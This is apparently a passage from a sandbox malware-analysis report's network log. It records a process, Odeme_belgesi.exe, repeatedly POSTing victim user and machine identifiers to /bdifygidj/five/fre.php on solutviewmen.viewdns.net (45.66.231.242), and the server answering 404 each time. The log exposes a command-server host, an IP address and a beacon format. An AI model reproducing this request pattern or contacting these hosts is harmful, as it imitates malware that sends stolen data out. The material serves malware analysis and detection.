              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:27.951433897 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:00 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.44976145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:28.106476068 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:28.111445904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:28.839479923 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:01 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.44976245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:28.992115974 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:28.997000933 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:29.661706924 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:01 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.44976345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:29.802953959 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:29.807740927 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:30.557697058 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:02 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.44976445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:30.725789070 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:30.730772018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:31.394030094 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:03 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.44976545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:31.536519051 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:31.541451931 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:32.194015026 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:04 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.44976645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:32.340009928 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:32.344918966 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:33.024852037 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:05 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.44976745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:33.281197071 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:33.286077976 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:33.949079990 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:06 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.44976845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:34.113163948 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:34.118880987 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:34.773499012 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:07 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.44976945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:34.928299904 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:34.933166027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:35.684986115 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:07 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.44977045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:35.834328890 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:35.839128017 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:36.536109924 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:08 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.44977145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:36.701838970 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:36.706650972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:37.350745916 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:09 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.44977245.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:37.519464970 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:37.524415970 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:38.216752052 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:10 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.44977345.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:38.369221926 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:38.374177933 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:39.220180988 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:11 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.44977445.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:39.380389929 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:39.385441065 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:40.152374029 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:12 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.44977545.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:40.323199034 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:40.328120947 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:41.021992922 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:13 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.44977645.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:41.376389980 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:41.381303072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:42.240808964 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:14 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.44977745.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:42.415899038 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:42.421720982 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:43.424582958 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:15 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.44977845.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:43.584779978 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:43.589678049 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:47.272047043 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:19 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.44977945.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:47.459558010 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:47.464643955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:48.112679958 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:20 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.44978045.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:48.287878990 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:48.292928934 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:48.953130007 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:21 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.44978145.66.231.242807124C:\Users\user\Desktop\Odeme_belgesi.exe
              TimestampBytes transferredDirectionData
              Oct 1, 2024 10:55:49.343225956 CEST259OUTPOST /bdifygidj/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: solutviewmen.viewdns.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: F1FA537E
              Content-Length: 149
              Connection: close
              Oct 1, 2024 10:55:49.348505974 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
              Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
              Oct 1, 2024 10:55:50.175956964 CEST177INHTTP/1.1 404 Not Found
              Server: nginx/1.10.3
              Date: Mon, 30 Sep 2024 22:26:22 GMT
              Content-Type: text/html
              Connection: close
              X-Powered-By: PHP/5.3.3
